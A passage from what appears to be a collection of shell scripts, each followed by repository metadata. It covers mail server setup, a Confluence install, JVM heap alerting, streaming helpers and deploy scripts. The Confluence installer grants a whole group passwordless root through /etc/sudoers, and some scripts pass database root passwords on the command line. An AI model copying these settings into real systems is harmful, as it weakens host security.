GRANT EXECUTE, SHOW VIEW, ALTER, ALTER ROUTINE, CREATE, CREATE ROUTINE, CREATE TEMPORARY TABLES, CREATE VIEW, DELETE, DROP, EVENT, INDEX, INSERT, REFERENCES, TRIGGER, UPDATE, LOCK TABLES ON roundcube.* TO 'roundcube'@'127.0.0.1' IDENTIFIED BY 'YOUR_PASSWORD';
GRANT SELECT, UPDATE ON mailserver.* TO 'roundcube'@'127.0.0.1';
FLUSH PRIVILEGES;
USE roundcube;
EOF
chmod -R 644 /usr/share/nginx/roundcubemail/temp /usr/share/nginx/roundcubemail/logs
cp $CURRENT_DIR/roundcube_config /usr/share/nginx/roundcubemail/config/config.inc.php
mysql -uroot -pYOUR_PASSWORD roundcube < /usr/share/nginx/roundcubemail/SQL/mysql.initial.sql
rm -r /usr/share/nginx/roundcubemail/installer
cd /usr/share/nginx/roundcubemail/plugins/password/
cp config.inc.php.dist config.inc.php
sed -i "s/<?php/<?php \n # PLEASE READ ME \n #Some array values are overwritten in the end of this file!/" config.inc.php
echo `cat $CURRENT_DIR/roundcube_password_plugin_config` >> /usr/share/nginx/roundcubemail/config/config.inc.php
service php5-fpm restart
service nginx reload
# Install autoconfig and autodiscover
mkdir /usr/share/nginx/autoconfig_and_autodiscover
cp $CURRENT_DIR/autoconfig.php /usr/share/nginx/autoconfig_and_autodiscover/
cp $CURRENT_DIR/autodiscover.php /usr/share/nginx/autoconfig_and_autodiscover/
cp $CURRENT_DIR/nginx_config_for_autoconfig_and_autodiscover /etc/nginx/sites-enabled/autoconfig_and_autodiscover
# Install SpamAssassin
apt-get install spamassassin spamc -y
groupadd spamd
useradd -g spamd -s /bin/false -d /var/log/spamassassin spamd
mkdir /var/log/spamassassin
chown spamd:spamd /var/log/spamassassin
cp /etc/default/spamassassin /etc/default/spamassassin.orig
sed -i "s/ENABLED=0/ENABLED=1/" /etc/default/spamassassin
sed -i "s/CRON=0/CRON=1/" /etc/default/spamassassin
# Clean version
# SAHOME="/var/log/spamassassin/"
# OPTIONS="--create-prefs --max-children 2 --username spamd -H ${SAHOME} -s ${SAHOME}spamd.log"
sed -i "s/OPTIONS=.*/SAHOME=\"\/var\/log\/spamassassin\/\"\nOPTIONS=\"--create-prefs --max-children 2 --username spamd -H \${SAHOME} -s \${SAHOME}spamd.log\"/" /etc/default/spamassassin
# ADD "-o content_filter=spamassassin" AFTER smtp inet n - - - - smtpd
sed -i "s/smtp .* smtpd/smtp inet n - - - - smtpd\n -o content_filter=spamassassin/" /etc/postfix/master.cf
echo "
spamassassin unix - n n - - pipe
user=spamd argv=/usr/bin/spamc -f -e
/usr/sbin/sendmail -oi -f \${sender} \${recipient}
" >> /etc/postfix/master.cf
service postfix restart
service spamassassin restart
#Move spam message to spam folder
apt-get install dovecot-sieve dovecot-managesieved
echo "
protocol lmtp {
postmaster_address = admin@cursedly-host.gzeki.com
mail_plugins = $mail_plugins sieve
}
" >> /etc/dovecot/conf.d/20-lmtp.conf
echo "
plugin {
sieve = ~/.dovecot.sieve
sieve_global_path = /var/lib/dovecot/sieve/default.sieve
sieve_dir = ~/sieve
sieve_global_dir = /var/lib/dovecot/sieve/
}
" > /etc/dovecot/conf.d/90-sieve.conf
service dovecot restart
mkdir /var/lib/dovecot/sieve/
echo "
require \"fileinto\";
if header :contains \"X-Spam-Flag\" \"YES\" {
fileinto \"Junk\";
}
" > /var/lib/dovecot/sieve/default.sieve
chown -R vmail:vmail /var/lib/dovecot
sievec /var/lib/dovecot/sieve/default.sieve
# Tests
# Spamassassin
# Check your local.cf syntax
# spamassassin --lint
# tail -f /var/log/spamassassin/spamd.log
# Message with content XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X must always be spam.
# Postfix
# postmap -q admin@cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-mailbox-maps.cf must return 1
# postmap -q alias@cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-alias-maps.cf must return admin@cursedly-host.gzeki.com
# postmap -q cursedly-host.gzeki.com mysql:/etc/postfix/mysql-virtual-mailbox-domains.cf must return 1
# Debugging
# openssl passwd -1 123456 WORKING CUURECTLY
# openssl passwd -1 123456 = $1$pfhfftkU$3/0sv66/HiM0Dn6l3qRiq/
| true |
539ae850fbadbf28de889d392da04379d2084625 | Shell | tgm4883/streamdeck-settings | /DBD/scripts/stream-toggle.sh | UTF-8 | 533 | 2.90625 | 3 | [] | no_license | #!/bin/bash
. ~/creds
if test -f "/home/thomas/Streaming/DBD/gamestate.txt"; then
source /home/thomas/Streaming/DBD/gamestate.txt
else
GAMESTATE='Start'
fi
if [[ $GAMESTATE == 'BETWEEN' ]]
then
/usr/bin/obs-cli scene switch "Game" --password $obs_pass
echo "GAMESTATE='INGAME'" > /home/thomas/Streaming/DBD/gamestate.txt
else
/home/thomas/Streaming/Twitch/twitch-stats.sh
/usr/bin/obs-cli scene switch "Between Games" --password $obs_pass
echo "GAMESTATE='BETWEEN'" > /home/thomas/Streaming/DBD/gamestate.txt
fi
| true |
8ed07d9470eeb6cfa13e5948e56ac28423a4f811 | Shell | dvnagesh/docker | /confluence/install-confluence.sh | UTF-8 | 974 | 2.65625 | 3 | [] | no_license | /usr/sbin/groupadd atlassian
/usr/sbin/useradd --create-home --home-dir /opt/confluence --comment "Account for running Confluence Software" -g atlassian --shell /bin/bash confluence
echo "%atlassian ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers
curl -Lks https://www.atlassian.com/software/confluence/downloads/binary/atlassian-confluence-${CONFLUENCE_VERSION}.tar.gz -o /root/confluence.tar.gz
tar zxf /root/confluence.tar.gz --strip=1 -C /opt/confluence
rm -rf /root/confluence.tar.gz
chown -R confluence:atlassian /opt/confluence
chmod -R u=rwx,go-rwx /opt/confluence
mkdir -p /opt/confluence-home
chown -R confluence:atlassian /opt/confluence-home
chmod -R u=rwx,go-rwx /opt/confluence-home
echo "confluence.home = /opt/confluence-home" > /opt/confluence/confluence/WEB-INF/classes/confluence-init.properties
mv /opt/confluence/conf/server.xml /opt/confluence/conf/server.xml.orig
mv /opt/confluence/confluence/WEB-INF/web.xml /opt/confluence/confluence/WEB-INF/web.xml.orig
| true |
2446cb6dd1331814aab55fce852204259cf0e82b | Shell | theprimo/Shell_Scripts_For_Various_Checks | /java_heap_check_v0.2.sh | UTF-8 | 1,153 | 2.875 | 3 | [] | no_license | curHrMin=`date +"%H:%M"`
MAXHEAPLIMIT=70.99
pid=`ps -ef | grep "weblogic.Server" | grep -v $curHrMin |awk -F ' ' '{print $2}' | head -1`
ec=`/products/jdk1.7/bin/jstat -gc $pid | tail -1 | awk -F ' ' '{print $5}'`
eu=`/products/jdk1.7/bin/jstat -gc $pid | tail -1 | awk -F ' ' '{print $6}'`
eUsage=$(echo "scale=6;$eu/$ec" | bc)
ePer=$(echo "scale=6;$eUsage*100" | bc)
echo "Current Eden Space (HEAP)="$ePer
if [ "$(echo $ePer '>' 99.99 | bc -l)" -eq 1 ]
then
echo "Load on Eden Space is" ${ePer}%
fi
pc=`/products/jdk1.7/bin/jstat -gc $pid | tail -1 | awk -F ' ' '{print $9}'`
pu=`/products/jdk1.7/bin/jstat -gc $pid | tail -1 | awk -F ' ' '{print $10}'`
pUsage=$(echo "scale=6;$pu/$pc" | bc)
PPer=$(echo "scale=6;$pUsage*100" | bc)
echo "Current PermGenSpace Usage="$PPer
#if [ "$(echo $PPer '>' 69.99 | bc -l)" -eq 1 ]
if (( $(echo "$PPer > $MAXHEAPLIMIT" |bc -l) ));
then
echo "Load on PermGen Space is" ${PPer}%
echo -e "Hi All \n\n PermGen Threshold of 99.99% exceeded and the usage detected is ${PPer}% \n\n Thanks & Regards,\n SSO AM Team"| mailx -s "Alert!! in $HOSTNAME - Interface connection status" v.a.cherukuri@accenture.com
fi
| true |
52142eebd05a6274b4b8d7cf509e4c5f09ad2beb | Shell | adrian-amaglio/streamplayer | /streamplayer | UTF-8 | 845 | 3.5625 | 4 | [] | no_license | #!/bin/bash
#trap : SIGTERM SIGINT
# TODO end this
if [ -n "$1" ] ; then
if [ "$1" -ge "$index_begining" ] ; then
stream_number="$1"
else
stream_number="$index_begining"
fi
else
stream_number="$index_begining"
fi
# TODO what if undefined ?
config_file=$XDG_CONFIG_HOME/streamplayer/conf
# TODO what if undefined ?
pid_file=$XDG_RUNTIME_DIR/streamplayer.pid
# TODO $player must contain no whitespace to compare with /proc/.../cmdline
player=mplayer
if [ -e $pid_file ]
then
echo "$pid_file"
kill `cat /run/user/$UID/streamplayer.pid`
else
while read -r line
do
IFS=' ' read stream_name stream_url <<< "$line"
echo "$stream_name"
$player "$stream_url" >/dev/null 2>/dev/null &
player_pid="$!"
echo "$player_pid" > "$pid_file"
wait
echo 'next'
rm "$pid_file"
done < "$config_file"
fi
| true |
94a3943bf62160bf75a12c758f823f9d02ac8a29 | Shell | feirm/app | /deploy.sh | UTF-8 | 938 | 3.515625 | 4 | [
"MIT"
] | permissive | #/bin/bash
# Feirm Platform web app deployment script
# Deployment folders
PRODUCTION="app.feirm.com"
STAGING="staging.feirm.com"
# Current branch
CURRENT_BRANCH=$(git branch --show-current)
# Production deployment
# Fetch latest tag
echo 'Getting ready for production deployment...'
LATEST_TAG=$(git describe --abbrev=0)
# Checkout and compile for production
git checkout $LATEST_TAG
rm -rf node_modules
yarn install
yarn build --mode production
# Copy files over to server
echo 'Transferring files to production server...'
scp -r dist/* feirm:/home/jack/Feirm-Caddy/caddy_data/$PRODUCTION
# Cleanup
rm -rf dist/
rm -rf node_modules
# Checkout back to previous branch
git checkout $CURRENT_BRANCH
# Staging deployment
# Use current branch
yarn install
yarn build --mode staging
# Copy files over to server
echo 'Transferring files to staging server...'
scp -r dist/* feirm:/home/jack/Feirm-Caddy/caddy_data/$STAGING
rm -rf dist/ | true |
08efd0f8bb58a342772d36a0efbb155ef1d2fb33 | Shell | bash-suite/ml-replace | /ml-replace.sh | UTF-8 | 2,326 | 4.34375 | 4 | [
"MIT"
] | permissive | #!/bin/bash
#
# Multiline replace tool using sed.
#
readonly progname=$(basename $0)
# Display help message
getHelp() {
cat << USAGE >&2
Usage: $progname [search] [replace] [input]
Examples:
ml-replace.sh "$search" "$replace" input.txt > output.txt
USAGE
}
# At least three parameters areneeded
if [ $# -ne 3 ]; then
getHelp
exit 1
fi
#
search="$1"
replace="$2"
input="${3:--}"
# SYNOPSIS
# quoteSearch <text>
#
# DESCRIPTION
# Quotes (escapes) the specified literal text for use in a regular expression,
# whether basic or extended - should work with all common flavors.
#
# sed doesn't support use of literal strings as replacement strings - it invariably
# interprets special characters/sequences in the replacement string.
quoteSearch() {
sed -e 's/[^^]/[&]/g; s/\^/\\^/g; $!a\'$'\n''\\n' <<<"$1" | tr -d '\n';
}
# SYNOPSIS
# quoteReplace <text>
#
# DESCRIPTION
# Quotes (escapes) the specified literal string for safe use as the substitution
# string (the 'new' in `s/old/new/`).
#
# The search string literal must be escaped in a way that its characters aren't
# mistaken for special regular-expression characters.
quoteReplace() {
IFS= read -d '' -r < <(sed -e ':a' -e '$!{N;ba' -e '}' -e 's/[&/\]/\\&/g; s/\n/\\&/g' <<<"$1")
printf %s "${REPLY%$'\n'}"
}
# -> The newlines in multi-line input strings must be translated to '\n' strings,
# which is how newlines are encoded in a regex.
# -> $!a\'$'\n''\\n' appends string '\n' to every output line but the last (the
# last newline is ignored, because it was added by <<<)
# -> tr -d '\n then removes all actual newlines from the string (sed adds one
# whenever it prints its pattern space), effectively replacing all newlines
# in the input with '\n' strings.
# -> -e ':a' -e '$!{N;ba' -e '}' is the POSIX-compliant form of a sed idiom that
# reads all input lines a loop, therefore leaving subsequent commands to operate
# on all input lines at once.
#
# Sources from:
# https://stackoverflow.com/questions/29613304/is-it-possible-to-escape-regex-metacharacters-reliably-with-sed/29613573#29613573
# https://stackoverflow.com/questions/24890230/sed-special-characters-handling/24914337#24914337
sed -e ':a' -e '$!{N;ba' -e '}' -e "s/$(quoteSearch "$search")/$(quoteReplace "$replace")/" "$input"
| true |
fae071b22b1a8fe06e4c59ebbfcbe66d3de4d429 | Shell | ns-bak/tetracorder-tutorial | /src-local/specpr/src.fstospecpr/fstospecpr-multiple-hpux | UTF-8 | 1,080 | 3.921875 | 4 | [] | no_license | #!/bin/sh
# Script to add field spectra to an existing spd0xxx tape file
#
#
# test for command line arguments 1, 2, and 3
#
if test $# -lt 3
then echo " "
echo "syntax: fstospecpr-multiple base-filename spd0xxx ending-number-of-spectra [flags]"
echo " "
echo " valid flags: -na = no channel average (default)"
echo " valid flags: -av = channel average"
exit 1
fi
#
# copy the files
#
basename=$1
tapefile=$2
nfiles=$3
flags="-na"
if [ "$4" = "-av" ]
then
flags=$4
fi
count=0
#
while test $count -le $nfiles
do
if test $count -le 9
then
extension=.00$count
elif test $count -le 99
then
extension=.0$count
else
extension=.$count
fi
echo " "
echo "------------------------------------------------"
echo "TRANSLATING FILE:" $basename$extension
echo "fstospecpr $flags $basename$extension $tapefile"
fstospecpr $flags $basename$extension $tapefile
count=`expr $count + 1`
done
#
# finish
#
echo " "
echo "*** DONE ***"
| true |
67b083b64b45699f5146f87a2865b40250d06ae2 | Shell | mason-mx/ELK-Docker | /elk5/filebeat-entrypoint.sh | UTF-8 | 1,527 | 3.96875 | 4 | [] | no_license | #!/bin/bash
# Test an IP address for validity:
# Usage:
# valid_ip IP_ADDRESS
# if [[ $? -eq 0 ]]; then echo good; else echo bad; fi
# OR
# if valid_ip IP_ADDRESS; then echo good; else echo bad; fi
#
function valid_ip()
{
local ip=$1
local stat=1
if [[ $ip =~ ^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}$ ]]; then
OIFS=$IFS
IFS='.'
ip=($ip)
IFS=$OIFS
[[ ${ip[0]} -le 255 && ${ip[1]} -le 255 \
&& ${ip[2]} -le 255 && ${ip[3]} -le 255 ]]
stat=$?
fi
return $stat
}
echo "Please enter the IP address of the ElasticSearch:"
read hostip
tryagain () {
echo "Incorrect IP format detected, please input once again:"
read hostip
checkip
}
checkip () {
if valid_ip $hostip;
then
echo "Going to feed $hostip"
else
tryagain
fi
}
checkip
sed -i "s/localhost/$hostip/" ./ncedc-earthquakes-filebeat.yml
# Add pipeline and template
curl -XPUT -H 'Content-Type: application/json' "$hostip:9200/_ingest/pipeline/ncedc-earthquakes" -d @/earthquakes/ncedc-earthquakes-pipeline.json
curl -XPUT -H 'Content-Type: application/json' "$hostip:9200/_template/ncedc-earthquakes" -d @/earthquakes/ncedc-earthquakes-template.json
set -e
# Add elasticsearch as command if needed
#if [ "${1:0:1}" = '-' ]; then
# set -- node "$@"
#fi
# As argument is not related to elasticsearch,
# then assume that user wants to run his own process,
# for example a `bash` shell to explore this image
exec "$@"
| true |
8bcb158fa88866139735c4e69540d3b4ab7b2f1c | Shell | ysong4/losha-1 | /apps/simhash/handle_glove2.2m/script/cal_groundtruth.sh | UTF-8 | 553 | 2.828125 | 3 | [
"Apache-2.0"
] | permissive | cd ../build
# cmake ../ -DCMAKE_BUILD_TYPE=Debug
cmake ../ -DCMAKE_BUILD_TYPE=Release
make cal_groundtruth 2>&1 | tee ../script/log.txt
cd ../script
log=`grep error log.txt`
if [ "$log" != "" ]; then
exit
fi
topk=10
dimension=300;
base_file="./output/glove2.2m_base.fvecs"
query_file="./output/glove2.2m_query.fvecs"
ivecs_bench_file="./output/glove2.2m_groundtruth.ivecs"
lshbox_bench_file="./output/glove2.2m_groundtruth.lshbox"
../build/bin/cal_groundtruth $base_file $query_file $topk $lshbox_bench_file $ivecs_bench_file $dimension
| true |
e24a9979be731b11ba6a1dd72052b3a8ec191ac6 | Shell | nitinkundani/Guessing-Game-Project | /guessinggame.sh | UTF-8 | 382 | 4 | 4 | [] | no_license | #Program to check the guess of number of files in a directory
#- Nitin Kundani
no_files=$(ls | wc -l)
guess=-1
while [[ $guess -ne $no_files ]]
do
echo "How many files are in the current directory ?"
read arg
guess=$arg
if [[ $guess -gt $no_files ]]
then
echo "Too high"
elif [[ $guess -lt $no_files ]]
then
echo "Too low"
else
echo "Congratulations, your guess is correct."
fi
done
| true |
ee19ba72718fa76078828849cd7bb6c2e512dc89 | Shell | ewon/efive | /src/rc.d/rc.bewanadsl | UTF-8 | 1,784 | 3.609375 | 4 | [] | no_license | #!/bin/bash
#
# $Id: rc.bewanadsl 1899 2008-09-16 19:54:22Z owes $
#
eval $(/usr/local/bin/readhash /var/ipcop/ppp/settings)
# Debugging. Comment it out to stop logging
DEBUG="yes"
msg() {
if [ "z$DEBUG" != "z" ] ; then
/usr/bin/logger -t red "BEWAN ADSL: $*"
fi
/bin/echo "$*"
}
function wait_for_showtime() {
count=0
while [ ! $count = 45 ]; do
/bin/sleep 2
if ( /bin/cat /proc/net/atm/UNICORN:* | /bin/grep -q "SHOWTIME" ); then
return 0
fi
((++count))
done
return 1
}
if [ "$MODEM" = "PCIST" ]; then
UNICORN="unicorn_pci_atm"
else
UNICORN="unicorn_usb_atm"
if [ ! -f "/proc/bus/usb/devices" ]; then
msg "No USB enabled"
exit 1
fi
# commented because actually cat /proc/bus/usb/devices may trigger some verbose error until pppd session start
# if ( ! /bin/cat /proc/bus/usb/devices | /bin/grep -q 'Vendor=07fa' ); then
# msg "No ST chip : not supported by this driver"
# exit 1
# fi
fi
# See how we were called.
case "$1" in
start)
# ActivationMode : ANSI=1,G.lite=2,MULTI=3,G.dmt=4
case "$MODULATION" in
GDMT) ActivationMode=4 ;;
ANSI) ActivationMode=1 ;;
GLITE) ActivationMode=2 ;;
AUTO) ActivationMode=3 ;;
esac
msg "Loading $UNICORN, Modulation=$MODULATION, may take time to uncompress..."
/sbin/modprobe "$UNICORN" ActivationMode="$ActivationMode"
if [ ! $? = 0 ]; then
msg "Loading fail, is the modem plugged in?"
exit 1
fi
wait_for_showtime
if [ $? = 1 ]; then
exit 1
fi
;;
stop)
msg "stop"
;;
cleanup)
msg "cleanup"
/sbin/modprobe -r "$UNICORN"
;;
*)
/bin/echo "Usage: $0 {start|stop|cleanup}"
exit 1
;;
esac
exit 0
| true |
2033c0dd8ec612ef4b4654e87cae0e7b4fe91890 | Shell | i95n/pdqtogo | /scripts/release-it.sh | UTF-8 | 405 | 2.96875 | 3 | [
"MIT"
] | permissive | docker build -t pdqtogo -f continer/Dockerfile .
sh scripts/version.sh $(cat version.txt) feature > version.txt
imageid=$(docker images | grep "pdqtogo" | grep "latest" | awk '{print $3}')
version=$(cat version.txt)
docker tag $imageid i95north/pdqtogo:$version
echo "latest [pdqtogo#$imageid] was tagged with $version"
docker push i95north/pdqtogo
git tag -a v$version -m "Tagged version v$version" | true |
88a64e210c7d7d5d64c0253dc6c94aa4a58dc23a | Shell | d-salerno/tthbb13 | /TTHNtupleAnalyzer/utils/recursive-hadd.sh | UTF-8 | 798 | 3.546875 | 4 | [] | no_license | #!/bin/bash
set -e
#GNU parallel
PARCMD=~joosep/parallel
#list of input files
SRCFILE=$2
#directory under which to save output, will be created
DSTDIR=`mktemp -d`
DSTFILE=$1
#first pass, 10 files per hadd
rm -Rf $DSTDIR/step1
mkdir -p $DSTDIR/step1
echo "step1"
cat $SRCFILE | $PARCMD -n10 hadd $DSTDIR/step1/merged_{#}.root {}
#second pass, 5 files per hadd
rm -Rf $DSTDIR/step2
mkdir -p $DSTDIR/step2
echo "step2"
find $DSTDIR/step1 -name "merged_*.root" | $PARCMD -n5 hadd $DSTDIR/step2/merged_{#}.root {}
#final pass, hadd all
rm -f $DSTDIR/merged.root
echo "step3"
hadd $DSTDIR/merged.root $DSTDIR/step2/merged_*.root
rm -Rf $DSTDIR/step1
rm -Rf $DSTDIR/step2
#move final file
mv $DSTDIR/merged.root $DSTFILE
#output is at $DSTDIR/merged.root
du -csh $DSTFILE
#cleanup
rm -Rf $DSTDIR
| true |
b3587eb8a198a8008e842bdaf9a4cef28d33e70e | Shell | keixille/hackerrank | /Tutorials/Linux_Shell/Array_in_Bash/concatenate-an-array-with-itself.sh | UTF-8 | 166 | 3.265625 | 3 | [] | no_license | count=0
for line in `cat`
do
arr[$count]=`echo $line`
count=$(( $count+1 ))
done
concatenatedArr=`echo ${arr[@]} ${arr[@]} ${arr[@]}`
echo $concatenatedArr
| true |
063ade8741d5a73162ba379f0d5ea3e1327dc7b0 | Shell | Gr3yR0n1n/picoCtf2017-1 | /level-1/Bash Loop/ans.bash | UTF-8 | 150 | 3.140625 | 3 | [] | no_license | #!/bin/bash
for i in {0..4096};
do
l=`./bashloop $i`
if [ "$l" != "Nope. Pick another number between 0 and 4096" ]
then
echo $l
fi
done | true |
00b3d2b50e02c083bc335f2e3e4628d9f2995313 | Shell | danielgustafsson/sebuild | /scripts/invars.sh | UTF-8 | 872 | 3.625 | 4 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
# Copyright 2018 Schibsted
if [ $# -lt 1 ] ; then
echo "Must specify buildvars as argument." >&2
exit 1;
fi
set -e
for f in "$@"; do
. $f
done
if [ "$(command -v setval)" != "setval" ]; then
setval() {
local _k=$1
shift
eval "$_k=\"$*\""
echo "$_k=$*"
}
fi
if [ "$(command -v depend)" != "depend" ]; then
if [ -n "$depfile" ]; then
depend() {
for dep in $@; do
echo -n " ${dep}" >> ${depfile}
done
}
else
depend() {
:
}
fi
fi
setval BUILD_STAGE `echo $buildflavor | tr [:lower:] [:upper:]`
setval READLINK $(type -p greadlink readlink | head -1)
oldifs="$IFS"
IFS=":"
gp=""
for p in $gopath; do
ABSP=$($READLINK -f $p || true)
[ -z "$ABSP" ] && continue
gp="$gp:$ABSP"
done
# Strip initial :
setval GOPATH "${gp:1}"
IFS="$oldifs"
setval GOARCH $(go env GOARCH 2>/dev/null)
setval GOOS $(go env GOOS 2>/dev/null)
| true |
63494bd22bce32199d37adf825ef063e2bd5e489 | Shell | dawnbreaks/taomee | /hadoop/game-report/eqin/jobscheduler/cleanlog | UTF-8 | 810 | 3.1875 | 3 | [] | no_license | #!/bin/sh
if [ $# -ne 1 ] ; then
echo "Usage $0 project"
exit
fi
. /etc/profile
PROJECT=$1;
echo "clean the logs 15 days ago"
day=$(date +%Y%m%d --date='15 days ago')
file=${day}.log
rm ${file}
echo "clean result data in hdfs"
hdfsdata=/user/hadoop/result/${PROJECT}/${day}
hadoop fs -rmr $hdfsdata
echo "clean result data in database"
DAY=$(date +%Y-%m-%d --date='15 days ago')
REMOTE_EXEC_SQL="mysql -uroot -pta0mee --skip-column-names --host=192.168.11.237"
DB="hadoopdailyresult"
echo "DELETE FROM ${DB}.dboprcounter where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.failedlogin where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.onlinecount where time < '${DAY}'" | $REMOTE_EXEC_SQL
echo "DELETE FROM ${DB}.onlinetime where time < '${DAY}'" | $REMOTE_EXEC_SQL
| true |
22a70b562651f0c5c24827c3d7e323e13fef5719 | Shell | lollipopman/bin | /dockerrm | UTF-8 | 195 | 2.734375 | 3 | [] | no_license | #!/bin/bash
# Delete all containers
for container in $(docker ps -a -q); do
docker rm "${container}"
done
# Delete all images
for image in $(docker images -q); do
docker rmi -f "${image}"
done
| true |
52a997a7c66e2baa7201ea84e16dc18bb0b8f5ac | Shell | yodaos-project/voice-interface-google-assistant | /tools/build-host.sh | UTF-8 | 593 | 3.40625 | 3 | [
"Apache-2.0"
] | permissive | set -ex
PAR=1
while [ $# -gt 0 ]; do
case "$1" in
-j)
PAR=$2
shift
;;
-h)
printf "$help"
exit
;;
--*)
echo "Illegal option $1"
exit
;;
esac
shift $(( $# > 0 ? 1 : 0 ))
done
PROJECT_PATH=$(pwd)
# MAKR: - gRPC
GRPC_PATH=${PROJECT_PATH}/grpc
cd ${GRPC_PATH}
cd third_party/protobuf
./autogen.sh && ./configure && make -j$PAR
make install
ldconfig
export LDFLAGS="$LDFLAGS -lm"
cd ${GRPC_PATH}
make clean
make -j$PAR
make install
ldconfig
# MAKR: - GoogleAPIs
cd ${PROJECT_PATH}
cd googleapis/
make LANGUAGE=cpp -j$PAR
| true |
36c963bce641e96648cccd41eda0bd7989f781d9 | Shell | justpayne/jburkardt-f77 | /testpack/testpack.sh | UTF-8 | 366 | 3.046875 | 3 | [] | no_license | #!/bin/bash
#
gfortran -c -g testpack.f >& compiler.txt
if [ $? -ne 0 ]; then
echo "Errors compiling testpack.f"
exit
fi
rm compiler.txt
#
gfortran testpack.o
if [ $? -ne 0 ]; then
echo "Errors linking and loading testpack.o"
exit
fi
rm testpack.o
#
chmod ugo+x a.out
mv a.out ~/binf77/$ARCH/testpack
#
echo "Executable installed as ~/binf77/$ARCH/testpack"
| true |
039f5233302b1c4b95c7c1b69c7ed090bf6d7cf6 | Shell | kernsuite/packaging | /check_for_updates.sh | UTF-8 | 381 | 3.21875 | 3 | [] | no_license | #!/bin/bash -ve
KERN_ROOT="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
source ${KERN_ROOT}/settings.sh
pushd build
rm -f ${KERN_ROOT}/uscan_log
for i in $KERN_PACKAGES; do
if [ ! -d "$i" ]; then
git clone ${KERN_BASE}$i
fi
pushd $i
git checkout upstream
git checkout master
git pull
uscan --dehs 1>> ${KERN_ROOT}/uscan_log || true
popd
done
| true |
ff962224673fab925f810af4d5425293114e64a8 | Shell | jinx-lnx/system | /sys/gen-srv-info | UTF-8 | 5,329 | 3.6875 | 4 | [] | no_license | #!/bin/bash -u
# Gather a few important facts about this server and show the summary
# when someone logs into the server.
# -------------------------------------------------------------------
# OS VERSION
# -------------------------------------------------------------------
LSB=$(/usr/bin/lsb_release -rs)
if [ "${LSB}" == "12.04" ] ; then
OS="\e[41m$(/usr/bin/lsb_release -sd)\e[49m"
elif [ "${LSB}" == "16.04" ] ; then
OS="\e[45m$(/usr/bin/lsb_release -sd)\e[49m"
else
OS="$(/usr/bin/lsb_release -sd)"
fi
# -------------------------------------------------------------------
# SERVER TYPE
# -------------------------------------------------------------------
# The output of imvirt is not stable and sometimes shows "Unknown",
# so we will just distinguish between Physical and non-Physical.
# For some improvement, let's try the imvirt command up to 5 times
# or until it returns anything else but 'Unknown'.
for I in $(seq 5) ; do
TYPE=$(/usr/bin/imvirt 2>/dev/null)
if [ "${TYPE}" != "Unknown" ] ; then
break
fi
sleep .5
done
MODEL=
if [ -n "${TYPE}" ] ; then
if [ "${TYPE}" != "Physical" ] ; then
TYPE="Virtual (${TYPE})"
else
# Try to guess the actual server model
PROD=$(/usr/sbin/smbios-sys-info-lite | grep "^Product Name:" | cut -d ':' -f2 | sed -e 's/^[ ]\+//')
if [ -n "${PROD}" ] ; then
MODEL=" (${PROD})"
else
OEM=$(/usr/sbin/smbios-sys-info-lite | grep "^OEM System ID:" | cut -d ':' -f2 | sed -e 's/^[ ]\+//')
if [ "${OEM}" == "0x8127" ] ; then
MODEL=" (PowerEdge R420)"
elif [ "${OEM}" == "0x8162" ] ; then
MODEL=" (PowerEdge R430)"
fi
fi
fi
else
TYPE="UNKOWN"
fi
# -------------------------------------------------------------------
# WEB SERVER (nginx or lighttpd)
# -------------------------------------------------------------------
# Determine whether we are running lighttpd or nginx
RELEASE=$(lsb_release -rs)
if [ "${RELEASE}" == "12.04" -o "${RELEASE}" == "14.04" ] ; then
# Upstart
WEB=$(service --status-all 2>&1 | egrep " \[ \+ \] (nginx|lighttpd)" | cut -c9-)
else
# Systemd
WEB=$(systemctl list-unit-files --type=service | egrep "^(nginx|lighttpd).*enabled" | cut -d'.' -f1)
fi
# -------------------------------------------------------------------
# FIREWALL TYPE
# -------------------------------------------------------------------
if [ -x /usr/sbin/ufw ] ; then
FIREWALL="ufw"
elif [ -x /sbin/iptables ] ; then
FIREWALL="\e[45mplain iptables\e[49m"
else
FIREWALL="\e[41mUNKNOWN\e[49m"
fi
# -------------------------------------------------------------------
# APPLICATION SERVER
# -------------------------------------------------------------------
# A bit clumsy, but works...
# Are we a RAS?
if [ -x /usr/sbin/crm ] ; then
RES=$(/usr/sbin/crm resource show | grep Wildfly)
if [ -n "${RES}" ] ; then
APP="Wildfly Cluster"
else
RES=$(/usr/sbin/crm resource show | grep JBoss)
if [ -n "${RES}" ] ; then
APP="JBoss7 Cluster"
else
APP=""
fi
fi
else
# Standalone appserver?
/sbin/initctl show-config wildfly 2>/dev/null | grep -q "start on"
if [ $? -eq 0 ] ; then
APP="Wildfly"
else
/sbin/initctl show-config gwn-jboss 2>/dev/null | grep -q "start on"
if [ $? -eq 0 ] ; then
APP="JBoss7"
else
APP=""
fi
fi
fi
# -------------------------------------------------------------------
# Next auto-highstate
# -------------------------------------------------------------------
AUTO_DAY=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_weekday"' | sed 's/^.*: //')
AUTO_HR=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_hour"' | sed 's/^.*: //')
AUTO_QTR=$(/opt/gwn/python/timeslot-hasher.py --tag HIGHSTATE --weekdays mon tue wed thu fri --hours 0 1 2 3 4 5 6 7 | grep '"picked_quarter"' | sed 's/^.*: //')
cat << EOF > /etc/profile.d/gwn-show-srv.sh
# ----------------------------------------------------
# Auto-generated by /opt/gwn/system/create-srv-summary
# ----------------------------------------------------
printf "\n"
printf " +-----------------------------------------------------+\n"
printf " Server OS ${OS}\n"
printf " +-----------------------------------------------------+\n"
printf " Server Type ${TYPE} ${MODEL}\n"
printf " +-----------------------------------------------------+\n"
printf " Web Server ${WEB}\n"
printf " +-----------------------------------------------------+\n"
